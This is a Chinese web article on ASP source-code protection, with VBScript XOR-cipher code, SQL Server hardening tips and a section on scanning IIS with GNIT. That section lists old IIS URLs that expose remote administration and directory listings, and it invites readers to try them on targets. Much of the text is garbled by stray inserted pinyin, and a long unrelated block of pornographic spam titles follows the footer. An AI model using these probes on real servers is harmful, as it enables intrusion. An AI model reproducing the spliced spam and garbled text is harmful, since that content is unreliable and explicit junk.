由于ASP腳本是采用明文(plain text)方式來編寫的,所以應(yīng)用開發(fā)商辛苦開發(fā)出來的ASP應(yīng)用程序,一旦發(fā)布到運(yùn)行環(huán)境中去后,就很難確保這些"源代碼"不會(huì)被流傳出去。這樣就產(chǎn)生了如何有效地保護(hù)開發(fā)出來的ASP腳本源代碼的需求。
官方加密程序:從微軟免費(fèi)下載到sce10chs.exe 直接運(yùn)行即可完成安裝過程。安裝完畢后,將生成screnc.exe文件,這是一個(gè)運(yùn)行在DOS PROMAPT的命令工具。
運(yùn)行screnc - l vbscript source.asp destination.asp生成包含密文ASP腳本的新文件destination.asp用記事本打開看凡是"<%和%>"之內(nèi)的,不管是否注解,都變成不可閱讀的密文了,但無法加密中文。
幾種ASP源代碼保護(hù)方法:

1,"腳本最小化"即ASP文件中只編寫盡可能少的源代碼,實(shí)現(xiàn)
商業(yè)邏輯的腳本部分被封裝到一個(gè)COM/DCOM組件,并在ASP腳
本中創(chuàng)建該組件,進(jìn)而調(diào)用相應(yīng)的方法(methed)即可。應(yīng)用開發(fā)者
動(dòng)手開發(fā)ASP腳本應(yīng)用之前就可按此思路來開發(fā),或者直接用ASP
腳本快速開發(fā)出原型系統(tǒng)后,針對(duì)需要保護(hù)、加密的重要腳本用
COM/DCOM組件來重新開發(fā)、實(shí)現(xiàn)并替換。

2,"腳本加密"即ASP腳本仍直接按源代碼方式進(jìn)行開發(fā),但在發(fā)布到運(yùn)行環(huán)境之前將腳本進(jìn)行加密處理,只要把加密后的密文腳本發(fā)布出去。即在ASP.DLL讀取腳本這個(gè)環(huán)節(jié)加入密文還原的處理。實(shí)現(xiàn)這種思路的方法有兩種:一是自行開發(fā)一個(gè)ISAPI的IIS過濾(filter)塊,在ASP.DLL之前勾連(hook)對(duì)ASP腳本文件的讀取,以便把文件系統(tǒng)讀出的密文還原成ASP.DLL可以解釋的明文;
方法二是直接由ASP.DLL提供對(duì)ASP腳本加密處理的支持。微軟在新版本的Vbscript.dll jscript.dll中提供這種成為MS script encode技術(shù)的支持。這樣,無論是客戶端的Vbscript jscript(包括WSH腳本等),還是服務(wù)器端的Vbscript jscript (即ASP腳本)都可以支持加密處理。
MS script encode 技術(shù)具體的實(shí)現(xiàn)思路包括以下兩個(gè)方面:一是加密過程,通過提供一個(gè)實(shí)用程序?qū)Π珹SP腳本源代碼的文本文件進(jìn)行掃描,找出其標(biāo)記為<script language = "vbscript.encode">或<script language = "Jscript.encode">;二是還原過程,IE或ASP.DLL等執(zhí)行腳本時(shí)是統(tǒng)一通過Vbscript.dll jscript.dll來解釋執(zhí)行的,所以它們都能同時(shí)地、透明地支持明文和密文的腳本。
  總之,如果采用第一種思路,要么就自行在開發(fā)過程中遵照進(jìn)行,要么可以考慮選擇自動(dòng)轉(zhuǎn)換成visual basic 編譯代碼的通用的、實(shí)用工具;采取第二種思路的化,要么就自行開發(fā)IIS ISAPI過濾模塊,要么可以考慮直接采用MS script encode軟件。

下面來看看一種ASP可以使用的簡(jiǎn)單字符加密算法,而不是那些受限制的加密算法。其實(shí),這里介紹的加密算法對(duì)于一般的運(yùn)用來說已經(jīng)足夠解密人麻煩一陣子的了。它的加密基礎(chǔ)是最簡(jiǎn)單的Vernum密碼方法,它的基本原理是,需要有一個(gè)需要加密的明文和一個(gè)隨機(jī)生成的解密鑰匙文件。然后使用這兩個(gè)文件組合起來生成密文。

(明文) 組合 (密鑰) = 加密后的密文

所以這里介紹的是生成密鑰的代碼。我們假設(shè)我們生成的密鑰為512位長(zhǎng)的密鑰,它已經(jīng)足夠來加密一個(gè)文本字符了。代碼如下:

KeyGeN.asp文件
<%
******************************
KeyGeN.asp
******************************
Const g_KeyLocation = "C:\key.txt"
Const g_KeyLen = 512

On Error Resume Next

Call WriteKeyToFile(KeyGeN(g_KeyLen),g_KeyLocation)

if Err <> 0 Then
Response.Write "ERROR GENERATING KEY." & "<P>"
Response.Write Err.Number & "<BR>"
Response.Write Err.Description & "<BR>"
Else
Response.Write "KEY SUCCESSFULLY GENERATED."
End If

Sub WriteKeyToFile(MyKeyString,strFileName)
Dim keyFile, fso
set fso = Server.CreateObject("scripting.FileSystemObject")
set keyFile = fso.CreateTextFile(strFileName, true)
keyFile.WriteLine(MyKeyString)
keyFile.Close
End Sub

Function KeyGeN(iKeyLength)
Dim k, iCount, strMyKey
lowerbound = 35
upperbound = 96
Randomize Initialize random-number generator.
for i = 1 to iKeyLength
s = 255
k = Int(((upperbound - lowerbound) + 1) * Rnd + lowerbound)
strMyKey = strMyKey & Chr(k) & ""
next
KeyGeN = strMyKey
End Function

%>

在IIS下運(yùn)行上面的KeyGeN.asp頁面。你只需要如此做一次,他將把密鑰寫入文件c:\key.txt中 (如果你愿意的話,你也可以把這個(gè)文件放到另外一個(gè)更加安全的地方),然后你可以打開這個(gè)key.txt文件,它將包含512個(gè)ASCII碼在35到96之間的字符。并且由于是隨機(jī)生成的,所以每個(gè)人的私人密鑰文件key.txt將是不一樣的,下面是一個(gè)例子密鑰文件:

IY/;$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;<R/8U)XFHC<SR_E$.DLG=I+@5%*+OP:F_=;NSY`-^S.`AA=BJ3M0.WF#T5LGK
(=/<:+C2K/^7AI$;PUOME2+T8ND?W$C(J\,;631M-LD5F%%1TF_&K2A-D-54[2P,#*JU%6`0RF3CMF0(#T07UFZ=>#,+.AW_/+)
DIB;2DTIA57TT&-]O/*FM>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,$2#FWW5PBH^*<))A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U$:3XO^Q).KG&0N0);[LJ<OZ6IN?7N4
<GTL?(M4S8+3JMK5)HC%^1^+K;\$WBXPA?F&5^E\D$7%*O/U[1/?8(5:1OVWV*1Z-%`:K&V?X1,1KURD@3W0^D)<OG40?(VJ4EWL5A5M<$A);CQ36R9I]*U#Q%1<Y\&SA%#1<V

下面再仔細(xì)分析一下上面的程序,我們發(fā)現(xiàn)其中的lowerbound和upperbound的數(shù)值
其實(shí)就是你想使用來加密的ASCII字符范圍。

下面的代碼將介紹如何使用這個(gè)密鑰來加密和解密一個(gè)字符串

Crypt.asp文件
<%
Dim g_Key

Const g_CryptThis = "Now is the time for all good men to come to the aid of their country."
Const g_KeyLocation = "c:\key.txt"

g_Key = mid(ReadKeyFromFile(g_KeyLocation),1,Len(g_CryptThis))

Response.Write "<p>ORIGINAL STRING: " & g_CryptThis & "<p>"
Response.Write "<p>KEY VALUE: " & g_Key & "<p>"
Response.Write "<p>ENCRYPTED CYPHERTEXT: " & EnCrypt(g_CryptThis) & "<p>"
Response.Write "<p>DECRYPTED CYPHERTEXT: " & DeCrypt(EnCrypt(g_CryptThis)) & "<p>"

Function EnCrypt(strCryptThis)
Dim strChar, iKeyChar, iStringChar, i
for i = 1 to Len(strCryptThis)
iKeyChar = Asc(mid(g_Key,i,1))
iStringChar = Asc(mid(strCryptThis,i,1))
*** uncomment below to encrypt with addition,
iCryptChar = iStringChar + iKeyChar
iCryptChar = iKeyChar Xor iStringChar
strEncrypted = strEncrypted & Chr(iCryptChar)
next
EnCrypt = strEncrypted
End Function

Function DeCrypt(strEncrypted)
Dim strChar, iKeyChar, iStringChar, i
for i = 1 to Len(strEncrypted)
iKeyChar = (Asc(mid(g_Key,i,1)))
iStringChar = Asc(mid(strEncrypted,i,1))
*** uncomment below to decrypt with subtraction
iDeCryptChar = iStringChar - iKeyChar
iDeCryptChar = iKeyChar Xor iStringChar
strDecrypted = strDecrypted & Chr(iDeCryptChar)
next
DeCrypt = strDecrypted
End Function

Function ReadKeyFromFile(strFileName)
Dim keyFile, fso, f
set fso = Server.CreateObject("Scripting.FileSystemObject")
set f = fso.GetFile(strFileName)
set ts = f.OpenAsTextStream(1, -2)

Do While not ts.AtEndOfStream
keyFile = keyFile & ts.ReadLine
Loop

ReadKeyFromFile = keyFile
End Function

%>

在Crypt.asp中我們首先從密鑰文件中得到密鑰值,然后從這段密鑰中截取和我們需要加密的明文同樣長(zhǎng)度的密鑰。然后使用一個(gè)簡(jiǎn)單的異或操作將明文和密鑰進(jìn)行運(yùn)算,那么得到的結(jié)果就是加密后的密文了。過程很簡(jiǎn)單的。由于是使用了異或操作,所以解密將非常簡(jiǎn)單,只要使用同樣的密鑰對(duì)密文再次進(jìn)行異或操作就能夠解密了。在上面介紹的基礎(chǔ)上,你可以少加改動(dòng),就可以使用同樣的方法加密一個(gè)文件。唯一需要注意的是,對(duì)于一個(gè)二進(jìn)制文件,你需要做一些完整性檢查以保證轉(zhuǎn)換回來的字符不要越界。
現(xiàn)在你需要做的就是把密鑰保存在服務(wù)器上的一個(gè)安全的地方(不能夠被外部訪問)


15 SQL SERVER的安全性

目前用ASP編寫的WEB應(yīng)用中,后臺(tái)數(shù)據(jù)庫(kù)大部分SQL SERVER。SQL SERVER相對(duì)來說比較安全。但是也要小心地配置SQL Server。

1 安裝遠(yuǎn)程數(shù)據(jù)庫(kù)管理有風(fēng)險(xiǎn)
SQL Server支持從遠(yuǎn)程進(jìn)行數(shù)據(jù)庫(kù)的維護(hù)。在安裝時(shí)你可以選擇不安裝,安裝完成以后,你還可以通過"SQL Server Network Utility"來刪除遠(yuǎn)程管理。如果你要使用遠(yuǎn)程管理,請(qǐng)使用TCP/IP,并將缺省的端口1433改變?yōu)槠渌臄?shù)值。使用遠(yuǎn)程對(duì)你可能比較方便,便是請(qǐng)注意一個(gè)hacker只要知道你的SQL server密碼,就可以進(jìn)入你的數(shù)據(jù)庫(kù)。
2 改變sa的密碼
缺省安裝時(shí),SQL SERVER的sa賬號(hào)的密碼為空,建議你在Enterprise SERVER中,改變sa的密碼。
3 數(shù)據(jù)庫(kù)登錄賬號(hào)不要寫入ASP頁面中。


16 使用最新的掃描器掃描ASP漏洞

目前可以掃描IIS漏洞的掃描器有很多,比較有名的有ISS,CIS和gnit等。下面我們以GNIT為例子。
GNIT是個(gè)功能很強(qiáng)的漏洞掃描器,能掃描NT的用戶名和相關(guān)信息列表,掃描IIS的漏洞。
在WINNT的DOS模式下打下:
gnit <對(duì)方IP>
比如:gnit 172.1.1.1

GNIT開始掃描端口,從上圖可知目標(biāo)主機(jī)提供了HTTP,F(xiàn)TP,SMTP等服務(wù),掃描完后。會(huì)在GNIT目錄下生成一個(gè)HTML文件,其文件名是目標(biāo)主機(jī)的IP。打開這個(gè)HTML文件,會(huì)看到對(duì)方主機(jī)的一些信息和漏洞。這些信息和漏洞包括:用戶名和組的相關(guān)詳細(xì)信息,開放的服務(wù)和WEB掃描的漏洞等。我們比較關(guān)心的是WEB掃描的漏洞信息:
下圖是GNIT的WEB掃描一些信息,其中加粗部分是漏洞,當(dāng)然有些漏洞并不準(zhǔn)確,但不妨試試。(有必要說明下,以下我是在一臺(tái)NT4。01,IIS4。0,Option PACK6.0,并且缺省安裝)

 要測(cè)試這些漏洞很簡(jiǎn)單。比如:可在URL輸入:
 http://someurl/iisadmpwd/aexp3.htr
―――可遠(yuǎn)程管理IIS。

http://someurl/scripts/iisadmin/bdir.htr
――――目標(biāo)主機(jī)的硬盤全部目錄都一覽無余,并且有創(chuàng)建新目錄的功能(不過我在測(cè)試中,并不能創(chuàng)建遠(yuǎn)程目錄,但是能使目標(biāo)主機(jī)的WEB當(dāng)機(jī))
http://someurl/scripts/tools/getdrvrs.exe
 ----可在遠(yuǎn)程主機(jī)上創(chuàng)建ODBC數(shù)據(jù)庫(kù),不管數(shù)據(jù)庫(kù)路徑和數(shù)據(jù)庫(kù)是否存在。

 
   此外還有其它的漏洞,請(qǐng)網(wǎng)友自己測(cè)試。其解決方法請(qǐng)看上面的漏洞分析。如果用CIS掃描器,還有比較詳細(xì)的漏洞分析和解決方法。請(qǐng)讀者自己分析。

七、總結(jié)

  目前WEB數(shù)據(jù)庫(kù)訪問的多種技術(shù)中,比如CGI(通用網(wǎng)關(guān)接口)、JDBC、PHP、ASP,ASP以其開發(fā)周期短,存取方式數(shù)據(jù)庫(kù)簡(jiǎn)單,運(yùn)行速度快而成為眾多網(wǎng)站程序員的首選開發(fā)技術(shù)。但是其網(wǎng)絡(luò)安全性也是不容忽視的。做為一個(gè)ASP開發(fā)者,你必須關(guān)注NT和IIS的安全漏洞,從上面的討論我們可以看到ASP的很多漏洞都是由IIS所引起的。同時(shí)ASP程序員在開發(fā)自己的網(wǎng)站時(shí),要注意來自ASP程序設(shè)計(jì)不當(dāng)所引發(fā)的安全問題。

該文章在 2011/4/24 0:33:39 編輯過
關(guān)鍵字查詢
相關(guān)文章
正在查詢...
點(diǎn)晴ERP是一款針對(duì)中小制造業(yè)的專業(yè)生產(chǎn)管理軟件系統(tǒng),系統(tǒng)成熟度和易用性得到了國(guó)內(nèi)大量中小企業(yè)的青睞。
點(diǎn)晴PMS碼頭管理系統(tǒng)主要針對(duì)港口碼頭集裝箱與散貨日常運(yùn)作、調(diào)度、堆場(chǎng)、車隊(duì)、財(cái)務(wù)費(fèi)用、相關(guān)報(bào)表等業(yè)務(wù)管理,結(jié)合碼頭的業(yè)務(wù)特點(diǎn),圍繞調(diào)度、堆場(chǎng)作業(yè)而開發(fā)的。集技術(shù)的先進(jìn)性、管理的有效性于一體,是物流碼頭及其他港口類企業(yè)的高效ERP管理信息系統(tǒng)。
點(diǎn)晴WMS倉(cāng)儲(chǔ)管理系統(tǒng)提供了貨物產(chǎn)品管理,銷售管理,采購(gòu)管理,倉(cāng)儲(chǔ)管理,倉(cāng)庫(kù)管理,保質(zhì)期管理,貨位管理,庫(kù)位管理,生產(chǎn)管理,WMS管理系統(tǒng),標(biāo)簽打印,條形碼,二維碼管理,批號(hào)管理軟件。
點(diǎn)晴免費(fèi)OA是一款軟件和通用服務(wù)都免費(fèi),不限功能、不限時(shí)間、不限用戶的免費(fèi)OA協(xié)同辦公管理系統(tǒng)。
Copyright 2010-2025 ClickSun All Rights Reserved

老子影院午夜伦我不卡在线观看| 亚洲乱妇熟女爽到高潮视频高清| 又刺激又黄的一级毛片| 国产精品吹潮在线观看中文| 综合天天影视在线播放| 国产91最新视频| 成人av一区二区三区| 国产亚洲a级毛片| 快速了解99久久人妻精品免费一区| 亚州gay视频网址| 日韩无码特级中出视频| 日本综合另类欧美日韩| 欧美 日韩 国产 中文| 国产AV网址大全| 國產成人亞洲綜合小說區| 他缓慢而有力的撞着视频| 高潮无码在线观看网| 国产AⅤ一区二区三区传媒| 2022年最新无码国产在线视频| 91麻豆国产精品91久久久| 欧美啪啪福利视频尤物网| 国产精品99久久久久久蜜桃| 欧美日韩一区二区线看免费| 婷婷久久综合久94| 国产一级a毛一级a看免费视频一区二区三区91躁 | 欧美在线中文91| 看看免费a一片欧| 一区二区免费有码在线看| 亚洲国产精品肉丝丝袜99| 中文字幕免费视频二区| 亞洲歐久久国产一区二区三区| 色久一噜在线视频| 久久精品无码一区二区无码麻豆| 国产亚洲av无码乱码在线观看 | 日韩欧美不卡中文字幕| 国产18午夜免费观看| 亚洲精品国产一区二区三| 精品国产一区二区三区性| 亚洲韩国日本成在线| 日韩极品美女视频在线| 欧美熟妇人妻精品一区| 亚洲一本高清| 亚洲欧美色欲色香| 久久久久人妻精品一区果冻| 国产萌白酱甜味弥漫在线视频| 久99久精品免费视频15| 在线观看第一页欧美| 激情成人五月天成人AV免费在线| 日韩成人片免费视频| 久久精品国产亚洲av高清蜜臀| 日韩国产精品一区二区在线| 欧美一区二区三区精品啪啪 | 亞洲無碼天堂在線播放| 欧美日韩三级片一区二区三区 | 日本男人天堂网站| 青娱乐青青草国产精品| 亚洲欧美中文高清在线专区| 在线资源观看va| 日本久久精品亚洲一区二区| 在线天堂中文在线资源网av| 亚洲成a人网站在线看| 国产日本草莓久久久久久久| 91麻豆精品国产91久久久点播时间 | 国产大片在线观看你懂的| 亚洲人妻一区中文字幕在线| 成年中文字幕在线观看| 91精品国产全国免费观看| 亚洲欧洲日韩欧美综合网站| 一二三四日韩不卡| 免费精品国自产拍在线播放| 亚洲av无码成h人动漫在线观看3d| 日韩第一区第二区| 久热香蕉在线视频免费版| 打开腿闺蜜用黄瓜让我爽| 久久精品男人天堂| 丝袜欧美视频首页在线| 色噜噜狠狠综曰曰曰图片| 美国a级欲女春潮中文字幕| 欧美精品午夜蜜桃久综合影院| 热国产热中文视频分类| 国产成人yy精品在线| 无码人妻又粗又大| 亚洲成人免费久久| 中文精品在线观看综合| 国产日本a成人片在线观看| 好吊妞国产欧美日韩在线观看 | 国产成年人视频| 久久人人97超碰CAOPOREN| 少妇人妻一区二区中文字幕| 日本久久精品亚洲一区二区 | 日本少妇自慰一区二区| 成人亚洲综合天堂| 欧美一级aa大片高清在线播放| 欧美日韩国产码综合一区在线| 国产午夜鲁丝片av无码免费| 国产精品入口麻豆完整版| 亚洲 日产 综合 精品| 2024免费日韩视频网| 在线观看国产精品欧美亚洲专区| 视频福利在线| 亚洲色AV 性色在线观无码| 国产成人拍视频精品午夜网| 国产18午夜免费观看| 国产精品久久久九九av免费看| 强奷秘书吸乳免费观看| 国产超薄肉丝袜在线视频下载 | 亚洲伊人精品国产欧美中文字幕| 国产亚洲女v在线观看| 亚洲无码不卡宅男| 久久人妻一区精品色欧美| 日韩精品一区二区吉泽明步| 在线看污视频| 国产猛烈高潮大叫视频| 天天爽天天爽夜夜爽国产自己精品| 日本中文字幕版在线观看| 色欧美精品在线小视频| 韩国日本欧美国产精品| a级免费在线观看国产在线拍揄自揄视频不卡99 | 国产精品不卡无码?V在线播放| 国产又爽又黄的视频又刺激| 精品黄黄久久久免费看| 亚洲AV无码一区二区成人| 日韩在线一区二区三区不卡视频 | 免费国产a国产片高清下载| 日韩免费码中文在线观看视频| 国产麻豆一精品一AV 一免费| 色婷婷狠狠18禁久久| 精品无码线一区二区三区| 男人手机天堂网| 亚洲中文欧美日韩在线不卞| 国产精品入口麻豆完整版| 久久精品國產在熱亞洲完整版 | 日本xxxwww在线观看| 成人看片软件免费| 视频一区视频二区亚洲免费观看| 欧美做受三级级视频播放| 欧美日韩一区二区久久| 久久一区二区三区国产精品| 国产午睡精品沙发系列| 剧情演绎国产一区在线观看| 国产亚洲曰朝精品视频自拍| 产一级 片内射视频播放免费 | 乳熟女が五十路になって| 在线亚洲欧美| 午夜精品综合色一区| 黄色一级录象片| 在线观看片免费人成视频播free gay fuck xxxxhd蓝色 | 在线看日韩三级| 欧美一区亚洲成人| 亚洲欧美激情在线观看| 国产在线一区二区午夜| 精品无码久久| 国产色噜噜在线视频| 99这里只有精品观看在线| 一级特黄av无码专区| 久久久久九国产精品| 国产日本欧美亚洲精品视| 欧美亚洲美日更新在线| 中文字幕人妻偷伦在线视频| 三级国产毛片| 精品无码里番在线观看| 91久久精品国产免费| 亚洲人成网站在线小说| 曰夲特黄好吊在线观看| 亚洲精品无码福利国产在线观看| 无码一区二区三区无码精品| 清纯唯美亚洲欧美中文字幕| 成人亚洲欧美精品| 最新欧美色欧美理论电影| 大尺度视频网站无码| 精品欧美亚洲国产成人高清在| 亚洲中久在线视频| 欧美老妇肥唇BBB| 日本一视频一区视频二区| 国产毛片不卡| 日韩?v无码久久一区二区| 99久久精品蜜臀av| 日韩AV一区二区三区在线| 好色先生APP最新下载入口| 精品人妻无码一区二区三区不卡| 福利一区二区三区在线观看| 国产理论片在线播放| 国产亚洲精品观看| 国产小视频2020| 天天精品视频在线观看资源| 欧美一级理论在线观看| 四虎在线永久免费观看| 亚洲毛片在线播放一区二区| 别插我b嗯啊视频免费| 少爷被小混混c呻吟双腿大张视频| 国产又粗又爽又猛又黄视频| 亚洲高清一区二区三区免费| 免费国产一区日韩二区欧美三区| 日本精品精品一二区一本到| 国产精品拍自在线| 成人精品第一区二区| 亚洲电影成人av| 亚洲多毛妓女毛茸茸的| 产一级 片内射视频播放免费 | 亚洲AV无码国产一成久久精品国产成人综合 | 国产小视频全部视频资源| 黄色永久网站| 波多野结衣中文字幕三区| 中文字幕av媚药一区二区| 欧美一级a视频免费| 不戴奶罩的邻居hd中文| 亚洲国产毛片一区精品| 国产萌白酱甜味弥漫在线视频| 91久久精品无码一区二区大全| 色香蕉视频在线观看| 中日韩人妻av第1页av| 欧产精品无码AV天天爽| 人妻系列无码专区久久五月影音先锋男人站| japanese日韩精品中文字幕| free乌克兰嫩交hd| 国产一区二区在线观看网站 | 免费国产一区日韩二区欧美三区| 亚洲国产在视频线精品视频二代| 欧美日韩一区二区久久| 2022天堂亚洲视频在线观看| 粗大猛烈进出高潮的视频| 久久久亚洲综合| 在线资源观看va| 成人毛片在线免费在线观看| 有色免费无码在线| 欧美 中文字幕| 国产高跟脚交视频免费| 日本色网成人网站| av中文字幕网免费观看| 亚洲日本国产观看| 黄色 av 手机在线观看| 成人免费无码大片毛片抽搐| 亚洲国产真实视频网站| 少妇小莹的yin荡生活下视频| 精品国产电影久久久久| 婷婷综合在线| 国产午夜高清亚洲5毛| 啪啪无尽3d动漫漫画免费网站 | 久久久伊人网| 久久在热视频特级毛片| 久久精亚洲日本香蕉视频观看视频| 欧美无人区码卡二三卡| 台湾chinesegay男同志网| 国产精品91av在线观看| 成人无遮挡免费视频在线观看| 在线观看片免费人成视| 久久久久久 小视频| 精品人妻一区二区三区声综| 成人国产精品亚洲第一男人天堂av| 亚洲午夜精品福利在线| 日韩美中免费Av| 少妇无号一区二区三区| 老司机久久99久久精品| 亚洲精品中文字幕制服丝袜| 国产国语老龄妇女| 日产人妻无码一区二区三区| 大地资源网在线观看免费动漫| 又大又用力又疼又叫视频| 久久精品国产亚洲AⅤ无码偷窥 | 亚洲欧洲日产国码中文| 久久精品亚洲无中文东京热| 另类自拍亚洲欧美制服丝袜| 美国A级黄片免费看| 日韩无码中文无码| 少妇被又大又粗又爽毛片日本| 久久久无码国产精品丝袜| 黑人巨大跨种族VIDEO| 机机对机机2023手机免费下载版| 亚洲日本va午夜中文字幕| 在线岛国爱片免费无码AV| 欧美在线看片a勉费观看| 色吊丝永久性观看网站大全| 99国产我和子的与子乱视频| 亚洲欧美综合在线一区二区| 一区二区三区av天堂| 无码日韩毛片小视频| 国产一区日韩欧美二区日韩| 亚洲步兵中文字幕在线| 亚洲aⅴ婷婷五月产av中文| 欧美l日韩国产一级视频| 麻豆国产美女精品久久| 亚洲一区二区黄色免费观看| 成人福利片在线观看网站| 不卡黄片免费在线观看| 少妇spa推油被扣高潮| 国产精品久久久一区宅男| 日韩午夜激情影院| 国产日日韩免费不卡av| 久无色码中文字幕| 淫荡人妻视频| 亚洲日本国产观看| 久久免费看裸体电影| 2019午夜福利国产秒播| 亚洲步兵中文字幕在线| 大妹子影视剧在线观看全集免费 | 欧美视频在线观看免费网址 | 日韩av中文在线观看不卡网| 嫩草影院入口一二三免费| 色香蕉视频在线观看| 亚洲综合无码久久久久久| 午夜性做爰aaaaa| 国产精品一区欧美激情| 国产日本a成人片在线观看| 99久久亚洲精品无码毛片潘甜甜 | 色哟哟在线观看一区二区三区| 欧美亚洲日韩国产一区二区春药| 国产一区日韩欧美二区日韩| 欧美日韩在线播放| 亚洲一区二区夜色av| 三级在线观看午夜福利| 中文字幕人妻无码专区| 久久福利国产| 99精品费精品国产一区二区| 国产免费观看激情| 亚洲欧洲日产国码中文| 亚洲一卡2卡3卡4卡国产网站| 2024免费日韩视频网| 精品一区二区不卡无码?v| 欧美色少妇高潮4444| 中文字幕人妻无码专区| 青青热久久国产久精品| 午夜麻豆激情传媒2020| 国产一区二区午夜精品| 亚洲无码不卡宅男| 在线视频4k岛国无码专区| 女人毛多水多毛耸耸| 国产av毛片成年动作片| 欧美一区二区三区爱爱| 亚洲第一网站免费视频| 中文字幕无码日本欧美大片| 久久久一级片播放| 国产黄在线观看免费视频45分钟| 国产精品免久久久久毛片| 亚洲国产精品高清在线| 久久无码视频一区二区三区| 亚洲色婷婷无码国产精品| 凌晨三点看的片WWW在线看 | 久在线久热精品婷婷白嫩大三| 小小水蜜桃8高清视频| 国产精品永久免费在线| 亚洲精品黄色毛片| 国产日本a成人片在线观看| 最新2021久久精品| 夜夜嗨国产无码| 欧美亚州一区二区在线视频| 中文字幕成人午夜| 午夜成人福利视频免费看| 日韩午夜成人精品影视在线观看| 国产精品久久久精品免费| 动漫精品国产一区二区| 国内精品久久久无码一区二区| 亚洲第一中文字幕精品视频| 国产精品一久久香蕉国产观看次数几十亿次| 剧情演绎国产一区在线观看| 欧美一级特黄免费在线观看 | 日韩国产欧美三区四区| 无码任你躁久久久久久| 国产欧美一区二区三精品酒店 | 国产频99热精品在线| 2022天堂亚洲视频在线观看 | 日韩免费网页版视频| 亚洲综合av婷野外| http日韩在线播放| 色天天综合美女| 日产精品一区至六区 | 中文字幕无码专区制服丝袜| 国产又色又猛又黄的网站| 18禁无码av免费不卡| 了解最新亚洲无码床| 欧美人区二区三区| 国产乱人伦一二三区| 真人无码国产片在线观看| 性开放性开放交友网站| 国产三级视频在线播放观看| 麻豆视传媒短视频在线艾秋| 爆乳情帝国综合网社区| 久久免费看黄A级毛片资讯| 丁香五月激情99精品国产福利| 日韩毛片免费观看一区| 久久精品国产亚洲AⅤ无码偷窥| wwwaaa日韩在线播放| 高h翁妇肉乱文吃奶| 亚洲欧美日韩久久精品一区| 国产精品久线观看视频 | 欧美va亚洲va国产综合小辣椒| 欧美 日韩 中字 国产| 国产欧美一区二区三精品酒店| 国产强奸系列视频在线观看| 亚洲曰韩精品久久久| 无码国产福利A∨私拍| 久久精品国产777| 精品日韩亚洲?v无码| 一区二区无码人妻| 2018国产精产品在线不卡| 亚洲欧美国产精品无码中文字| 欧美一级特黄高清大片做受| 国产精品入口麻豆完整版| 国产激情午夜理伦片| 国产成人高清亚洲一区a| 国产av一区最新精品| 动漫精品中文字幕制服一区| 久久久久99精品成人| 台湾av国片精品秋霞电影| 高h翁妇肉乱文吃奶| 差差差很疼30分钟免费软件下载 | 无码专区韩国在线不卡| 综合人人天天国产天天人人| 中文精品亚洲制服无码AV| 国产亚洲精品影视网| 亚洲毛片在线亚洲av资源在线观看 | 久久亚洲精品1区2区| 欧美亚洲精品网站| 最新系列国产专区亚洲国产| 动漫卡通亚洲区第一页| 巨胸喷奶水视频WWW| JM天堂入口唯一官网| 国产精品一区二区AⅤ波多野 | 午夜成人福利视频免费看| 苍井空4d肉蒲团三级无删减版 | 99久久精品蜜臀av| 曰曰碰天国产天碰| 麻豆韩国无码av| 成人无码免费视频97| 色婷婷色综合缴情免费观看| 亚洲午夜精品福利在线| 拍国产乱人伦偷精品视频果冻传媒| 国产香蕉av网站| 少妇小莹的yin荡生活下视频| 日韩无码高清视频aa| 日韩aa级毛片免费不卡| 国产午睡精品沙发系列| 欧美老妇肥唇BBB| 东北浪妇的粗口叫床| 污视频网站在线| 日韩台湾va蜜桃在线| wwwaaa日韩在线播放| 国产欧美日韩在线综合网| 国产91在线播放九色竹菊| 四虎永久无码视频在线| 性一交一刮一伦一色一情孩| 中文字幕网站在线观看| 无码系列性饥渴寡妇肉乱| 亚洲国产一区二区三区在线视频| 亚洲av无码成h人动漫在线观看3d ?动漫美女羞羞喷液视频免费 | 亚洲欧美日韩国产精品激情综合在线| 亚洲av 性爱神马偷拍| 麻豆卡一卡二卡三卡四免费| 亚洲精品美女久久久久9999 | 久草手机在线播放| 久久免费的精品国产V| 少妇被又大又粗又爽毛片日本| 三级在线观看国产欧美| 伊人久久精品欧美| 午夜亚洲视频在线观看| 中国男男gay18无套网站| 黄色网页在线免费看| 欧美黑人巨大在线| 在线观看国产精品欧美亚洲专区| 欧美日韩国产图片区一区| 日日噜噜夜夜狠狠久久丁香五月亚洲高清毛片一区二区 | 丁香久久久激情五月天| 亚洲一级av不卡毛片无码| 久久精品国产777| 91视频国产尤物| 国产精品亚洲精品久久品尚网| 亚洲欧美日韩国产sss| 毛片内射一区二区三区| 欧美在线成人亚洲| 99久免费精品在线| 国产小视频2020| 强cao出水嗯啊高潮了视频| 欧美色少妇高潮4444| 国产精品不卡无码?V在线播放| 韩日无码视频电影在线| 在线观看亚洲一区二区蜜臀15| 永久不封國產毛片AV網煮站 | 国产精品色欲AV亚洲懂色四季粉| 国产美女白嫩在线观看| 大乳丰满人妻中文字幕日本| 黄页网站视频观看免费| 免费一级无码婬片在线观看 | 少妇爽翻喷白浆视频在线观看| 一级毛片AAAA免费观看| 国产视频不卡在线一区二区| 欧色A级成人免费三級| 亚洲欧美中文字幕专区| 国产av巨作久久婷婷| 在线观看中文亚洲国产精品 | 国产黄色网站短视频| 亚洲精品美女在线观看播放一区二区| 2019久久综合网| 国产精品制服诱惑日韩| 国产欧美日韩在线综合网| 噜噜噜爽爽爽午夜福利深夜| 日本理论片午夜理论片| 免费毛片在线观看67194| 大白屁股白浆XXⅩSS| 久久久亚洲精品亚洲| 国产精品一区二区国产主播| 国产九九九全国免费视频| 订国产精品一区二区三区四区| 日本高清不卡视频一区二区三区| 97视频在线资源免费| 国产一级a毛一级a看免费视频一区二区三区91躁 | 欧美毛片在线看片免费| 我想看真实女人一级特黄大片| 色欲综合久久中文字幕网| 欧美熟妇人妻精品一区| 亚洲a电影在线播放| 欧美一级A√在线观看| 无码福利一区二区三区| 大地资源网在线观看免费动漫| 精品人妻一区二区无码| 国产亚洲精无码77777在线| 国产三级精品三级在线观看777| 狠狠人妻久久久久久综合蜜桃久久 | 东京热无码一区二区无码观看| 噜噜噜爽爽爽午夜福利深夜| 日韩中文字幕无码中文字| 男女爽到高潮的免费网站| 国产精品久久久一区宅男| 在线视频高清免费观看| 国产A级黄片下载| 在线免费观看www| 国产中文欧美日韩| 国产91最新视频| 无码专区在线观看韩国| 男人扒开女人秘桶到爽电影| 乱码午夜-极国产极内射| 2021国产v亚洲v天堂无码| 69久久夜色国产精品69| 